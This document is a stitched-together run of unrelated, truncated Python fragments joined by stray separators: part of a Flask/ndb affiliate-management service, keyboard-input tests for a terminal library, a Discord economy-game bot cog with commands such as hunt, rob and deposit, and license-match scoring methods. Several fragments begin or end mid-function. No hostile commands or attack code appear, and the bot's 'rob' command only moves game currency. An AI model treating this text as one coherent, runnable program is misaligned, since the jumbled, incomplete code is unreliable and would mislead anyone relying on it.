if not (isinstance(affiliate_instance, Affiliates) and bool(affiliate_instance)):
message: str = "Affiliate not found: delete operation cannot be completed"
return jsonify({'status': False, 'message': message}), status_codes.data_not_found_code
affiliate_instance.is_active = False
affiliate_instance.is_deleted = True
key: Optional[ndb.Key] = affiliate_instance.put(
retries=self._max_retries, timeout=self._max_timeout)
if not isinstance(key, ndb.Key):
message: str = 'something went wrong while deleting affiliate'
raise DataServiceError(
status=error_codes.data_service_error_code, description=message)
# scheduling affiliate cache deletions
_kwargs: dict = dict(affiliates_view=AffiliatesView, organization_id=organization_id,
affiliate_id=affiliate_id)
app_cache._schedule_cache_deletion(
func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
return jsonify({'status': True,
'message': 'successfully deleted the affiliate',
'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
def mark_active(self, affiliate_data: dict, is_active: bool) -> tuple:
"""
**mark_active**
affiliate_id of the affiliate to be marked as active.
this action will not have an effect if the affiliate has been soft-deleted
:param affiliate_data: contains affiliate_id and organization_id
:param is_active:
:return:
"""
affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
if not isinstance(affiliate_id, str) or not bool(affiliate_id.strip()):
message: str = 'affiliate_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
organization_id: Optional[str] = affiliate_data.get('organization_id')
if not isinstance(organization_id, str) or not bool(organization_id.strip()):
message: str = 'organization_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
if not isinstance(is_active, bool):
raise ValueError("is_active is required and can only be a boolean")
affiliate_instance: Affiliates = Affiliates.query(Affiliates.organization_id == organization_id,
Affiliates.affiliate_id == affiliate_id).get()
if not (isinstance(affiliate_instance, Affiliates) and bool(affiliate_instance)):
message: str = "Affiliate Not Found: Unable to update record"
return jsonify({'status': False, 'message': message}), status_codes.data_not_found_code
if affiliate_instance.is_deleted and is_active:
message: str = "cannot activate / de-activate an affiliate if the affiliate has been deleted"
raise UnAuthenticatedError(
status=error_codes.un_auth_error_code, description=message)
affiliate_instance.is_active = is_active
key: Optional[ndb.Key] = affiliate_instance.put(
retries=self._max_retries, timeout=self._max_timeout)
if not isinstance(key, ndb.Key):
message: str = "An Unknown Error occurred while trying to mark affiliate as in-active"
raise DataServiceError(
status=error_codes.data_service_error_code, description=message)
# scheduling affiliate cache deletion
_kwargs: dict = dict(affiliates_view=AffiliatesView, organization_id=organization_id,
affiliate_id=affiliate_id)
app_cache._schedule_cache_deletion(
func=app_cache._delete_affiliate_cache, kwargs=_kwargs)
return jsonify({'status': True, 'message': 'successfully marked affiliate as inactive',
'payload': affiliate_instance.to_dict()}), status_codes.successfully_updated_code
@use_context
@handle_view_errors
@app_cache.cache.memoize(timeout=return_ttl('short'))
def get_affiliate(self, affiliate_data: dict) -> tuple:
"""
**get_affiliate**
obtains a record of one affiliate from the store. given either uid or affiliate_id, organization_id
must be valid
:param affiliate_data: contains affiliate_id and organization_id the affiliate must belong to the organization
:return: response contain affiliate record
"""
organization_id: Optional[str] = affiliate_data.get('organization_id')
if not isinstance(organization_id, str) or not bool(organization_id.strip()):
message: str = 'organization_id is required'
raise InputError(
status=error_codes.input_error_code, description=message)
affiliate_id: Optional[str] = affiliate_data.get('affiliate_id')
# Initializing affiliate_instance to None in order to allow testing for valid data
affiliate_instance: Optional[Affiliates] = None
valid_input: bool = False
# NOTE this means if affiliate_id is valid
if isinstance(affiliate_id, str) and bool(affiliate_id.strip()):
valid_input = True
affiliate_instance = Affiliates.query(Affiliates.organization_id == organization_id,
Affiliates.affiliate_id == affiliate_id).get()
uid: Optional[str] = affiliate_data.get('uid')
if isinstance(uid, str) and bool(uid.strip()):
valid_input = True
affiliate_instance = Affiliates.query(Affiliates.organization_id == organization_id,
Affiliates.uid == uid).get()
# if we are here and still dont have a valid input set to true then we have a problem with input data
if not valid_input:
message: str = "affiliate_id or uid is required to get affiliate record"
raise InputError(
status=error_codes.input_error_code, description=message)
# Note checking if we have | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
"Tests for keyboard support."
# std imports
import functools
import tempfile
import signal
import curses
#import time
import math
import tty # NOQA
import pty
import sys
import os
# local
from .accessories import (
init_subproc_coverage,
read_until_eof,
read_until_semaphore,
SEND_SEMAPHORE,
RECV_SEMAPHORE,
as_subprocess,
TestTerminal,
SEMAPHORE,
all_terms,
echo_off,
)
# 3rd-party
import pytest
import mock
import six
if sys.version_info[0] == 3:
unichr = chr
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_kbhit_interrupted():
# "kbhit() should not be interrupted with a signal handler."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_kbhit_interrupted')
#
# # child pauses, writes semaphore and begins awaiting input
# global got_sigwinch
# got_sigwinch = False
#
# def on_resize(sig, action):
# global got_sigwinch
# got_sigwinch = True
#
# term = TestTerminal()
# signal.signal(signal.SIGWINCH, on_resize)
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.raw():
# assert term.inkey(timeout=1.05) == u''
# os.write(sys.__stdout__.fileno(), b'complete')
# assert got_sigwinch
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# read_until_semaphore(master_fd)
# stime = time.time()
# os.kill(pid, signal.SIGWINCH)
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'complete'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 1.0
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_kbhit_interrupted_nonetype():
# "kbhit() should also allow interruption with timeout of None."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_kbhit_interrupted_nonetype')
#
# # child pauses, writes semaphore and begins awaiting input
# global got_sigwinch
# got_sigwinch = False
#
# def on_resize(sig, action):
# global got_sigwinch
# got_sigwinch = True
#
# term = TestTerminal()
# signal.signal(signal.SIGWINCH, on_resize)
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.raw():
# term.inkey(timeout=1)
# os.write(sys.__stdout__.fileno(), b'complete')
# assert got_sigwinch
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# read_until_semaphore(master_fd)
# stime = time.time()
# time.sleep(0.05)
# os.kill(pid, signal.SIGWINCH)
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'complete'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 1.0
def test_break_input_no_kb():
"cbreak() should not call tty.setcbreak() without keyboard."
@as_subprocess
def child():
with tempfile.NamedTemporaryFile() as stream:
term = TestTerminal(stream=stream)
with mock.patch("tty.setcbreak") as mock_setcbreak:
with term.cbreak():
assert not mock_setcbreak.called
assert term._keyboard_fd is None
child()
def test_raw_input_no_kb():
"raw should not call tty.setraw() without keyboard."
@as_subprocess
def child():
with tempfile.NamedTemporaryFile() as stream:
term = TestTerminal(stream=stream)
with mock.patch("tty.setraw") as mock_setraw:
with term.raw():
assert not mock_setraw.called
assert term._keyboard_fd is None
child()
def test_raw_input_with_kb():
"raw should call tty.setraw() when with keyboard."
@as_subprocess
def child():
term = TestTerminal()
assert term._keyboard_fd is not None
with mock.patch("tty.setraw") as mock_setraw:
with term.raw():
assert mock_setraw.called
child()
def test_notty_kb_is_None():
"term._keyboard_fd should be None when os.isatty returns False."
# in this scenerio, stream is sys.__stdout__,
# but os.isatty(0) is False,
# such as when piping output to less(1)
@as_subprocess
def child():
with mock.patch("os.isatty") as mock_isatty:
mock_isatty.return_value = False
term = TestTerminal()
assert term._keyboard_fd is None
child()
#def test_kbhit_no_kb():
# "kbhit() always immediately returns False without a keyboard."
# @as_subprocess
# def child():
# term = TestTerminal(stream=six.StringIO())
# stime = time.time()
# assert term._keyboard_fd is None
# assert not term.kbhit(timeout=1.1)
# assert math.floor(time.time() - stime) == 1.0
# child()
#
#
#def test_keystroke_0s_cbreak_noinput():
# "0-second keystroke without input; '' should be returned."
# @as_subprocess
# def child():
# term = TestTerminal()
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=0)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 0.0)
# child()
#
#
#def test_keystroke_0s_cbreak_noinput_nokb():
# "0-second keystroke without data in input stream and no keyboard/tty."
# @as_subprocess
# def child():
# term = TestTerminal(stream=six.StringIO())
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=0)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 0.0)
# child()
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_keystroke_1s_cbreak_noinput():
# "1-second keystroke without input; '' should be returned after ~1 second."
# @as_subprocess
# def child():
# term = TestTerminal()
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=1)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 1.0)
# child()
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_keystroke_1s_cbreak_noinput_nokb():
# "1-second keystroke without input or keyboard."
# @as_subprocess
# def child():
# term = TestTerminal(stream=six.StringIO())
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=1)
# assert (inp == u'')
# assert (math.floor(time.time() - stime) == 1.0)
# child()
#
#
#def test_keystroke_0s_cbreak_with_input():
# "0-second keystroke with input; Keypress should be immediately returned."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_keystroke_0s_cbreak_with_input')
# # child pauses, writes semaphore and begins awaiting input
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.encode('utf-8'))
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# os.write(master_fd, u'x'.encode('ascii'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'x'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#def test_keystroke_cbreak_with_input_slowly():
# "0-second keystroke with input; Keypress should be immediately returned."
# pid, master_fd = pty.fork()
# if pid == 0:
# cov = init_subproc_coverage('test_keystroke_cbreak_with_input_slowly')
# # child pauses, writes semaphore and begins awaiting input
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# while True:
# inp = term.inkey(timeout=0.5)
# os.write(sys.__stdout__.fileno(), inp.encode('utf-8'))
# if inp == 'X':
# break
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# os.write(master_fd, u'a'.encode('ascii'))
# time.sleep(0.1)
# os.write(master_fd, u'b'.encode('ascii'))
# time.sleep(0.1)
# os.write(master_fd, u'cdefgh'.encode('ascii'))
# time.sleep(0.1)
# os.write(master_fd, u'X'.encode('ascii'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'abcdefghX'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#def test_keystroke_0s_cbreak_multibyte_utf8():
# "0-second keystroke with multibyte utf-8 input; should decode immediately."
# # utf-8 bytes represent "latin capital letter upsilon".
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_0s_cbreak_multibyte_utf8')
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.encode('utf-8'))
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# os.write(master_fd, u'\u01b1'.encode('utf-8'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
# pid, status = os.waitpid(pid, 0)
# assert output == u'Ʊ'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#@pytest.mark.skipif(os.environ.get('TRAVIS', None) is not None,
# reason="travis-ci does not handle ^C very well.")
#def test_keystroke_0s_raw_input_ctrl_c():
# "0-second keystroke with raw allows receiving ^C."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_0s_raw_input_ctrl_c')
# term = TestTerminal()
# read_until_semaphore(sys.__stdin__.fileno(), semaphore=SEMAPHORE)
# with term.raw():
# os.write(sys.__stdout__.fileno(), RECV_SEMAPHORE)
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.encode('latin1'))
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, SEND_SEMAPHORE)
# # ensure child is in raw mode before sending ^C,
# read_until_semaphore(master_fd)
# os.write(master_fd, u'\x03'.encode('latin1'))
# stime = time.time()
# output = read_until_eof(master_fd)
# pid, status = os.waitpid(pid, 0)
# assert (output == u'\x03' or
# output == u'' and not os.isatty(0))
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#def test_keystroke_0s_cbreak_sequence():
# "0-second keystroke with multibyte sequence; should decode immediately."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_0s_cbreak_sequence')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=0)
# os.write(sys.__stdout__.fileno(), inp.name.encode('ascii'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# os.write(master_fd, u'\x1b[D'.encode('ascii'))
# read_until_semaphore(master_fd)
# stime = time.time()
# output = read_until_eof(master_fd)
# pid, status = os.waitpid(pid, 0)
# assert output == u'KEY_LEFT'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_keystroke_1s_cbreak_with_input():
# "1-second keystroke w/multibyte sequence; should return after ~1 second."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_keystroke_1s_cbreak_with_input')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# inp = term.inkey(timeout=3)
# os.write(sys.__stdout__.fileno(), inp.name.encode('utf-8'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# read_until_semaphore(master_fd)
# stime = time.time()
# time.sleep(1)
# os.write(master_fd, u'\x1b[C'.encode('ascii'))
# output = read_until_eof(master_fd)
#
# pid, status = os.waitpid(pid, 0)
# assert output == u'KEY_RIGHT'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 1.0
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_esc_delay_cbreak_035():
# "esc_delay will cause a single ESC (\\x1b) to delay for 0.35."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_esc_delay_cbreak_035')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=5)
# measured_time = (time.time() - stime) * 100
# os.write(sys.__stdout__.fileno(), (
# '%s %i' % (inp.name, measured_time,)).encode('ascii'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# os._exit(0)
#
# with echo_off(master_fd):
# read_until_semaphore(master_fd)
# stime = time.time()
# os.write(master_fd, u'\x1b'.encode('ascii'))
# key_name, duration_ms = read_until_eof(master_fd).split()
#
# pid, status = os.waitpid(pid, 0)
# assert key_name == u'KEY_ESCAPE'
# assert os.WEXITSTATUS(status) == 0
# assert math.floor(time.time() - stime) == 0.0
# assert 34 <= int(duration_ms) <= 45, duration_ms
#
#
#@pytest.mark.skipif(os.environ.get('TEST_QUICK', None) is not None,
# reason="TEST_QUICK specified")
#def test_esc_delay_cbreak_135():
# "esc_delay=1.35 will cause a single ESC (\\x1b) to delay for 1.35."
# pid, master_fd = pty.fork()
# if pid == 0: # child
# cov = init_subproc_coverage('test_esc_delay_cbreak_135')
# term = TestTerminal()
# os.write(sys.__stdout__.fileno(), SEMAPHORE)
# with term.cbreak():
# stime = time.time()
# inp = term.inkey(timeout=5, esc_delay=1.35)
# measured_time = (time.time() - stime) * 100
# os.write(sys.__stdout__.fileno(), (
# '%s %i' % (inp.name, measured_time,)).encode('ascii'))
# sys.stdout.flush()
# if cov is not None:
# cov.stop()
# cov.save()
# | |
= embed)
@commands.command(aliases=["pm"], description="Use your laptop to post some reddit memes")
@commands.check(custom_cooldown(1,30,1,12,BucketType.user))
async def postmeme(self, ctx):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
choices = ["d", "a", "n", "k"]
res = await self.check_for(ctx.author, "laptop")
if not res[0]:
if res[1] == 2:
return await ctx.send("You do not have a laptop!")
await ctx.send("""
- `D` **Dank meme**
- `A` **A meme**
- `N` **Normie meme**
- `K` **Kool meme**
""")
def check(msg):
return msg.author == ctx.author and msg.channel == ctx.channel
try:
msg = await self.bc.wait_for("message", check=check, timeout=10)
except asyncio.TimeoutError:
return await ctx.send("Your choices have timed out")
else:
if msg.content.lower() in choices:
earnings = random.randrange(0, 3000)
data["wallet"] += earnings
await ctx.send("You posted your meme and you got **{}** coins from it".format(earnings))
await self.upsert(data)
else:
return await ctx.send("You did not enter the choices right")
@commands.command(description="Start all over again with a few buffs")
async def prestige(self,ctx):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
if "prestige" not in data:
data["prestige"] = 0
if data["wallet"] <= 5000000:
return await ctx.send("You do not have 5 million coins to prestige!")
data["prestige"] += 1
embed = discord.Embed(
title = "Prestige Rewards",
description = "**You have now reached prestige {}**\nYour inventory and coins have been reset but you get the following things:".format(data["prestige"]),
color = random.choice(self.bc.color_list)
)
if data["prestige"] in range(0, 6):
data["bag"] = [{'name': 'Laptop', 'id': 'laptop', 'amount': 1}, {'name': 'Fishing Pole', 'id': 'fishingpole', 'amount': 1}, {'name': 'Basic Lootbox', 'id': 'lootbox', 'amount': 1}]
data["wallet"] = 0
data["bank"] = 0
data["banklimit"] = 75000
embed.add_field(name="Rewards", value="Laptop x1\nFishing Pole x1\nBasic Lootbox x1\n\nStarter Bank Space: 75k")
elif data["prestige"] in range(5, 11):
data["bag"] = [{'name': 'Laptop', 'id': 'laptop', 'amount': 1}, {'name': 'Fishing Pole', 'id': 'fishingpole', 'amount': 1}, {'name': 'Hunting Rifle', 'id': 'rifle', 'amount': 1}, {'name': 'Basic Lootbox', 'id': 'lootbox', 'amount': 2}]
data["wallet"] = 0
data["bank"] = 0
data["banklimit"] = 100000
embed.add_field(name="Rewards", value="Laptop x1\nFishing Pole x1\nRifle x1\nBasic Lootbox x2\n\nStarter Bank Space: 100k")
elif data["prestige"] > 15:
data["bag"] = [{'name': 'Laptop', 'id': 'laptop', 'amount': 1}, {'name': 'Fishing Pole', 'id': 'fishingpole', 'amount': 1}, {'name': 'Hunting Rifle', 'id': 'rifle', 'amount': 1}, {'name': 'Phone', 'id': 'phone', 'amount': 1}, {'name': 'Basic Lootbox', 'id': 'lootbox', 'amount': 2}]
data["wallet"] = 0
data["bank"] = 0
data["banklimit"] = 150000
embed.add_field(name="Rewards", value="Laptop x1\nFishing Pole x1\nRifle x1\nPhone x1\nBasic Lootbox x2\n\nStarter Bank Space: 150k")
await ctx.send(embed=embed)
await self.upsert(data)
@commands.command(description="Go hunting for some wild animals")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def hunt(self, ctx):
await self.check_acc(ctx.author)
res = await self.check_for(ctx.author, "rifle")
if not res[0]:
if res[1] == 2:
return await ctx.send("You do not have a hunting rifle!")
animals = ["skunk", "cow", "rabbit", "bear"]
randanimal = random.choice(animals)
chance = random.randrange(0,100)
if chance < 71:
await self.add_item(ctx.author, randanimal, 1)
await ctx.send("You fired your rifle and caught a {}".format(randanimal))
else:
await ctx.send("You fired your rifle and the animal got away.")
@commands.command(description="Go fishing with your old man")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def fish(self, ctx):
await self.check_acc(ctx.author)
res = await self.check_for(ctx.author, "fishingpole")
if not res[0]:
if res[1] == 2:
return await ctx.send("You do not have a fishing pole!")
fish = random.randrange(1,3)
await self.add_item(ctx.author, "fish", fish)
await ctx.send("You have caught {} fish".format(fish))
@commands.command(aliases=["scout"], description="Look for coins around the world")
@commands.check(custom_cooldown(1,30,1,12,BucketType.user))
async def search(self,ctx):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
await ctx.send("**Where do you want to search?**\nPick one of the options below to search", view=Search(self.bc, ctx))
@commands.command(description="Beg for coins.")
@commands.check(custom_cooldown(1,30,1,12,BucketType.user))
async def beg(self,ctx):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
earnings = random.randint(0, 800)
if earnings in range(0, 200):
await ctx.send("**Some guy** donated {}".format(earnings))
if earnings in range(201, 400):
await ctx.send("**<NAME>** donated {}".format(earnings))
if earnings in range(401, 600):
await ctx.send("**<NAME>** donated {}".format(earnings))
if earnings in range(601, 800):
await ctx.send("**BongoPlayzYT** donated {}".format(earnings))
data["wallet"] += earnings
await self.upsert(data)
@commands.command(aliases=["with"], description="Take some money out of your bank")
async def withdraw(self,ctx,amount):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
if amount == "all":
amount = data["bank"]
if amount == "half":
amount = data["bank"] / 2
amount = int(amount)
if amount > data["bank"]:
return await ctx.send("You dont have that much money in your bank!")
data["wallet"] += amount
data["bank"] -= amount
await self.upsert(data)
await ctx.send("Successfully withdrew **{}** coins from your bank!".format(amount))
@commands.command(aliases=["dep"], description="Put some money into your bank")
async def deposit(self,ctx,amount):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
if amount == "all":
amount = data["wallet"]
if amount + data["bank"] > data["banklimit"]:
maths = data["wallet"] - data["banklimit"]
amount = data["wallet"] - maths - data["bank"]
if amount == "half":
amount = data["wallet"] / 2
amount = int(amount)
if amount > data["wallet"]:
await ctx.send("You dont have that much money!")
return
if amount < 0:
await ctx.send("Amount must be positive")
return
if amount + data["bank"] > data["banklimit"]:
await ctx.send("You dont have enough space in your bank!")
return
data["bank"] += amount
data["wallet"] -= amount
await self.upsert(data)
await ctx.send("Successfully deposited **{}** coins!".format(amount))
@commands.command(description="Check out the top 10 global richest people using this bot")
async def rich(self,ctx):
data = await self.bc.economy.get_all()
lb = sorted(data, key=lambda x: x["wallet"], reverse=True)
em = discord.Embed(
title="Top 10 Global Users With the most amount of money in their wallet"
)
index = 0
for user in lb:
if index == 10 or index == len(lb):
break
else:
index += 1
em.add_field(name=f"{index}. {self.bc.get_user(user['_id'])}", value=f"{user['wallet']}", inline=False)
await ctx.send(embed=em)
@commands.command(description="Buy an item from the shop")
async def buy(self,ctx,item,amount=1):
await self.check_acc(ctx.author)
res = await self.buy_item(ctx.author, item, amount)
if not res[0]:
if res[1] == 1:
return await ctx.send("That item was not found!")
if res[1] == 2:
return await ctx.send("This item cannot be bought!")
if res[1] == 3:
return await ctx.send("You don't have enough money in your wallet for this!")
await ctx.send("Item Bought Successfully!")
@commands.command(description="Sell an item for 1/3 of its price")
async def sell(self,ctx,item,amount=1):
await self.check_acc(ctx.author)
res = await self.sell_item(ctx.author, item, amount)
if not res[0]:
if res[1] == 1:
return await ctx.send("That item was not found!")
if res[1] == 2:
return await ctx.send("You don't have that much of that item to sell!")
name_ = None
item_name = item.lower()
for item in shop:
if item_name == item["id"]:
name_ = item
break
if not name_:
for item in shop:
if item_name in item["id"]:
name_ = item
break
if not name_:
return await ctx.send("I could not find that item in the shop! Please check your spelling!")
await ctx.send("Item Sold Successfully for {} coins!".format(int(name_["cost"] / 3)))
@commands.command(aliases=["inv"], description="Check out what items you have in your inventory")
async def inventory(self,ctx, member:discord.Member=None):
member = member or ctx.author
await self.check_acc(member)
data = await self.bc.economy.find(member.id)
embed = discord.Embed(
title="{}'s inventory".format(member.name),
color = random.choice(self.bc.color_list)
)
if len(data["bag"]) == 0:
embed.add_field(name="This inventory is empty!", value="Use the shop command to get some items!")
else:
for item in data["bag"]:
embed.add_field(name=f"{item['name']} ─ {item['amount']:,d}", value="ID: `{}`".format(item["id"]), inline=False)
await ctx.send(embed=embed)
@commands.command(description="Turn this on so no one can rob you")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def passive(self, ctx):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
data["passive"] = not data["passive"]
ternary = "enabled" if data["passive"] else "disabled"
await ctx.send(f"Your passive mode is now {ternary}")
await self.upsert(data)
@commands.command(description="rob a person")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def rob(self,ctx,member:discord.Member):
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
await self.check_acc(member)
data2 = await self.bc.economy.find(member.id)
earnings = random.randint(0,data2["wallet"])
if data2["passive"]:
await ctx.send(
"This person is in passive mode leave him alone :(_ _")
return
if data["passive"]:
await ctx.send(
"Mate you are in passive mode so you cant rob someone"
)
return
data["wallet"] += earnings
data2["wallet"] -= earnings
await ctx.send("You robbed this person and got {}".format(earnings))
await self.upsert(data)
await self.upsert(data2)
@commands.command(description="Share some coins and bring some joy :)")
async def share(self,ctx,member:discord.Member, amount:int):
if amount < 0:
return await ctx.send("Amount must be a positive number")
await self.check_acc(ctx.author)
data = await self.bc.economy.find(ctx.author.id)
await self.check_acc(member)
data2 = await self.bc.economy.find(member.id)
if amount > data["wallet"]:
return await ctx.send("You dont have that much money!")
if data["passive"]:
return await ctx.send("You are in passive mode you have to turn that off to share coins!")
if data2["passive"]:
return await ctx.send("This person has passive mode on so you cannot share coins to them!")
data["wallet"] -= amount
data2["wallet"] += amount
await ctx.send("You have now shared **{}** to `{}`".format(amount, member))
await self.upsert(data)
await self.upsert(data2)
@commands.command(description="rob a person's bank", usage="<user>")
async def heist(self, ctx, member: discord.Member):
await self.check_acc(ctx.author)
| |
query contains stopwords between its start and end
in the query. Stopwords are never match by construction.
"""
# The query side of the match may not be contiguous and may contain
# unmatched stopword tokens.
query = self.query
qspan = self.qspan
# note: to avoid breaking many tests we check query presence
if query:
qspe = qspan.end
# Count stopword tokens that are inside the matched range, ignoring
# end position of the query span. This is used to check if there are
# stopwords inside an "only_known_words" match.
stopwords_pos = qspan & query.stopwords_span
stopwords_pos = (pos for pos in stopwords_pos if pos != qspe)
qry_stopxpos = query.stopwords_by_pos
return any(qry_stopxpos[pos] for pos in stopwords_pos)
def qrange(self):
"""
Return the maximal query length represented by this match start and end
in the query. This number represents the full extent of the matched
query region including matched, unmatched and IGNORING unknown tokens.
"""
return self.qspan.magnitude()
def qdensity(self):
"""
Return the query density of this match as a ratio of its length to its
qmagnitude, a float between 0 and 1. A dense match has all its matched
query tokens contiguous and a maximum qdensity of one. A sparse low
qdensity match has some non-contiguous matched query tokens interspersed
between matched query tokens. An empty match has a zero qdensity.
"""
mlen = self.len()
if not mlen:
return 0
qmagnitude = self.qmagnitude()
if not qmagnitude:
return 0
return mlen / qmagnitude
def idensity(self):
"""
Return the ispan density of this match as a ratio of its rule-side
matched length to its rule side magnitude. This is a float between 0 and
1. A dense match has all its matched rule tokens contiguous and a
maximum idensity of one. A sparse low idensity match has some non-
contiguous matched rule tokens interspersed between matched rule tokens.
An empty match has a zero qdensity.
"""
return self.ispan.density()
def score(self):
"""
Return the score for this match as a rounded float between 0 and 100.
The score is an indication of the confidence that a match is good. It is
computed from the number of matched tokens, the number of query tokens
in the matched range (including unknowns and unmatched) and the matched
rule relevance.
"""
# relevance is a number between 0 and 100. Divide by 100
relevance = self.rule.relevance / 100
if not relevance:
return 0
qmagnitude = self.qmagnitude()
# Compute the score as the ration of the matched query length to the
# qmagnitude, e.g. the length of the matched region
if not qmagnitude:
return 0
# FIXME: this should exposed as an q/icoverage() method instead
query_coverage = self.len() / qmagnitude
rule_coverage = self._icoverage()
if query_coverage < 1 and rule_coverage < 1:
# use rule coverage in this case
return round(rule_coverage * relevance * 100, 2)
return round(query_coverage * rule_coverage * relevance * 100, 2)
def surround(self, other):
"""
Return True if this match query span surrounds other other match query
span.
This is different from containment. A matched query region can surround
another matched query region and have no positions in common with the
surrounded match.
"""
return self.qstart <= other.qstart and self.qend >= other.qend
def is_after(self, other):
"""
Return True if this match spans are strictly after other match spans.
"""
